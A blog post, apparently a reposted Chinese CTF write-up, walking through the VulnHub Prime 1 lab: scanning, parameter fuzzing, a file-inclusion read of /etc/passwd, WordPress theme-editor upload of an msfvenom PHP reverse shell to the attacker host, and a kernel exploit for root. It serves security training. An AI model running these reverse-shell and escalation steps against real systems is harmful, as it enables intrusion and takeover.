vulnhub靶场练习:Prime_Series_Level-1

最新推荐文章于 2024-02-26 11:06:51 发布
最新推荐文章于 2024-02-26 11:06:51 发布
阅读量124 收藏
点赞数
分类专栏: 网络安全技术 文章标签: vulnhub 提权 靶场 kali
原文链接:https://zhuanlan.zhihu.com/p/663953806
版权

1 环境

1.1 靶机

在 https://www.vulnhub.com/entry/prime-1,358/ 下载虚拟机,用户名victor,密码未知。

1.2 攻击机

kali2022,ip地址为192.168.198.172。

1.3 目的

获得靶机的root权限。

2 主机扫描和ip扫描

2.1 查看子网

打开虚拟网络适配器查看c段:

 可以看到子网为192.168.198.0/24

2.2 主机扫描

nmap -sP 192.168.198.0/24

在靶机的设置中查看物理地址:

 

再结合上面的扫描结果,得知靶机ip地址为192.168.198.130

另外一种扫描方法:

arp-scan -l

2.3 端口扫描 

nmap -p 1-65535 -A 192.168.198.130

开放端口为22(ssh)和80(http)端口。

3 目录扫描

扫描80端口的文件。

dirb http://192.168.198.130/

 

这里可以看到扫描出了各种类型的文件,可以看到这里有一个wordpress,在后续可能有用。

扫描80端口指定扩展为.txt,.php,.zip的文件:

dirb http://192.168.198.130/ -X .txt,.php,.zip

 

 扫出一个secret.txt,两个php文件:image.php,index.php。

访问secret.txt可以看到提示:

提示中说需要进行模糊测试。

4 模糊测试

先测试index.php:

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.198.130/index.php?FUZZ

过滤word字段响应,因为大部分宽度都是12 W,可以尝试过滤掉大部分的响应:

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.198.130/index.php?FUZZ

 

 访问该地址:

 看到提示文件名不对,根据上面的提示,尝试填入:"location.txt"。

 

得到新的提示:在另一个php文件访问secrettier360。

尝试访问目标机器的 /etc/passwd 文件:

curl http://192.168.198.130/image.php?secrettier360=/etc/passwd

成功访问回显:

注意到倒数第2行提示:

 

直接访问文件 

http://192.168.198.130/image.php?secrettier360=/home/saket/password.txt

 

得到一个密码:follow_the_ippsec

尝试登录ssh:

 

ssh登录失败。

尝试mysql也登录失败。

结合在目录扫描时扫出的wordpress(CMS),尝试从这里入手。

扫描用户名:

wpscan --url http://192.168.198.130/wordpress/ --enumerate u

发现了一个victor用户,用刚才的密码登录,成功登录到网站:

 在Appearance的Edit Themes选项中找到一个可以编辑的文件,这里找到secret.php,

 下一步需要建立反弹连接。

5  建立反弹连接

生成payload:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.198.172 lport=7777 -o shell.php

将payload复制到secret.php,然后记得点Update File保存:

打开msfconsle,开启监听:

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.198.172
set lport 7777
exploit

 

 

浏览器访问secret.php的路径:

http://192.168.198.130/wordpress/wp-content/themes/twentynineteen/secret.php

查看是否成功连接:

 成功获得执行命令的权限:

得到操作系统版本为ubuntu 16.04.2

6 root提权 

新打开一个msf,16.04版本ubuntu的漏洞:

searchsploit 16.04 Ubuntu

靶机内核版本为4.10.0,可以利用Local Privilege Escalation,脚本地址 linux/local/45010.c

编译:

 在建立连接的端口上传脚本:

upload /test/p1 /tmp/p1

 进入shell,为p1添加可执行权限并执行:

shell
cd /tmp
chmod +x p1
./p1

输入 whoami 回显root说明成功提权。

2,4(1H,3H)-PD are mine
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub Prime_Series_Level-1
人若无名,便可专心练剑
11-12 283
follow_the_ippsec应该就是一个密码,开始发现了开启了22端口,所以,试试ssh登录,账号用开始/etc/passwd上面的。成功读取并回显了/etc/passwd,浏览器的效果看的头晕,还是用curl看一下**,这个可以在互联网上搜索到wordpress的主题编辑页面的路径。,至于/themes前面的路径是啥,应该是wordpress主题的固定路径,也就是。提示我们,可以无密码的形式以root运行。这样应该就可以执行了,再次执行。dirb + X参数。发现,成功登录进去了。
vulnhub靶场-Prime1
ad12456的博客
03-30 2860
靶场练习
vulnhub渗透测试靶场练习2
00勇士王子的博客
09-02 610
VulnHub靶机-easy_cloudantivirus
prime_series_level-1
m0_46982383的博客
07-23 778
FUZZ 、cp /bin/bash /tmp/challenge
Prime_Series_Level-1渗透流程
RemedyVI的博客
07-10 175
首先端口扫描发现22,80端口,然后目录扫描找到,访问/dev得到提示,进一步目录扫描找到secure.txt。使用wfuzz进行模糊测试,找到file参数,获取location.txt,最后得到利用文件包含获取/etc/passwd的内容然后获取wordpress的登录密码。进入后台后利用主题文件可编辑的漏洞获取反弹shell,最后利用系统漏洞提权
Vulnhub靶场Prime_Series_Level-1渗透
m0_65712192的博客
02-12 1694
Vulnhub靶场Prime_Series_Level-1渗透
VulnHub靶场MONEYBOX:1
01-05
MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成各种挑战,提权、漏洞利用、代码审计等,最终获得root权限并发现flag。 在...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
在XXE靶场中,我们可以模拟实际场景进行练习,例如在vulnhub的XXE Lab:1靶场中,首先识别靶机IP,使用工具如nmap扫描开放端口,然后通过目录遍历(如`robots.txt`)和Burp Suite抓包分析,确定XML数据传输。...
VulnHub靶场系列:Chili
快吃小蛋糕吧的博客
10-05 1366
VulnHub靶场系列:Chili 刚刚在VulnHub官网上找了些简单的靶机,感觉这个还挺适合新手的 环境部署: https://download.vulnhub.com/chili/Chili.ova 实战: 首先使用工具扫描靶机所在网段,得到靶机IP: root@kali:/# nmap -sP 192.168.200.129/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 08:56 CST Nmap scan report f
vulnhub靶场PHINEAS: 1实战记录
aoke79的博客
08-09 1420
vulnhub靶场PHINEAS: 1实战记录
0x01--Prime_Series_Level-1靶场
growler67
09-16 1782
001–靶场介绍 Primevulnhub靶场环境的一个简单的利用靶场,我们可以在vulnhub的官网里搜索到它,Prime系列共有六个靶场,本次使用的是19年出的第一个靶场环境。 介绍及下载链接:https://www.vulnhub.com/entry/prime-1,358 002–安装 靶场下载后是一个压缩文件,解压后用vm打开就行了,默认网络连接方式是nat,开机后自动获取VM虚拟网卡的dhcp地址。 查看本地的nat网段的操作如下: 003–攻击 本次环境模拟在未知具体ip地址的环境进行渗
prime_series_level-1靶场详解
苏生要努力
02-26 1239
将secret.php文件上传成功后,使用msf见天模块(exploit/multi/handler),设置lhost和lport和payload(php/meterpreter/reverse_tcp),开启监听后,浏览器打开secret.php页面。访问一下http://192.168.236.136/dev和http://192.168.236.136/wordpress。msf脚本数据库路径/usr/share/exploitdb/exploits/linux/local。
vulnhub-prime_series_level_1渗透测试
遇事不决冲冲冲
11-22 6253
环境搭建 官网https://www.vulnhub.com/entry/prime-1,358/ 将VMX文件(VMWare 文件格式详解 .VMX .VMSD .VMDK )直接拖进来 思路 扫描网站路径与敏感文件,通过不断的提示找到一个可用的fuzz工具。利用fuzzing爆破参数发现了可利用进行文件包含的参数file,这里再得到提示后,在仅有的一个php文件中利用secrettier360参数fuzzing系统敏感文件,找到一个密码后在wordpress页面进行登录,找到一个可以写入内容的页面,写
Prime_Series_Level-1
cnmeimei的博客
02-09 427
0x01 先收集靶机端口,目录信息1)nmap扫描端口开启了ssh服务和apache服务,搜索相关漏洞只有一个ssh用户名枚举,先放着2)dirb爆破目录 dirb http://192.168.0.102 发现两个可以目录/dev目录内容:意思让我们更深层次的挖掘目录信息/wordpress 可知这是一个wp博客还有管理员登陆页面,但不知道账号密码0X02 按照以上信息和提示操作1) dirb爆破dirb http://192.168.0.102 -X .txt,.html,.php 得到一个s...
Vulnhub靶机 Prime_Series_Level-1
菜浪马废的博客
04-29 860
换一个参数 secrettier360 返回结果太多 过滤一下 ??? 觉得自己被耍了 这不是saket的密码 我吐了 是victor的 我*****他的 连接成功 以为突破口是env 最后还是内核提权 我用的最后一个漏洞 先在kali上编译 gcc -o poc 45010.c 然后传到靶机上 直接运行 Vulnhub就打到这吧 主要是还要下载 太麻烦了...
ant-design-vue-2.2.0-beta.5.zip
最新发布
08-26
基于 Ant Design 和 Vue 的企业级 UI 组件库
ant-design-vue-1.3.16.zip
08-26
基于 Ant Design 和 Vue 的企业级 UI 组件库
ant-design-vue-1.1.0-beta.0.zip
08-26
基于 Ant Design 和 Vue 的企业级 UI 组件库
ssm411基于SSM的个人事务管理系统的设计和实现+vue.zip
08-26
使用旧方法对个人事务管理信息进行系统化管理已经不再让人们信赖了,把现在的网络信息技术运用在个人事务管理信息的管理上面可以解决许多信息管理上面的难题,比如处理数据时间很长,数据存在错误不能及时纠正等问题。 这次开发的个人事务管理系统管理员功能有个人中心,用户管理,通讯录管理,财务信息管理,个人事务管理,系统帮助管理。用户可以注册登录,管理自己的通讯录和事务信息。经过前面自己查阅的网络知识,加上自己在学校课堂上学习的知识,决定开发系统选择B/S模式这种高效率的模式完成系统功能开发。这种模式让操作员基于浏览器的方式进行网站访问,采用的主流的Java语言这种面向对象的语言进行个人事务管理系统程序的开发,在数据库的选择上面,选择功能强大的MySQL数据库进行数据的存放操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值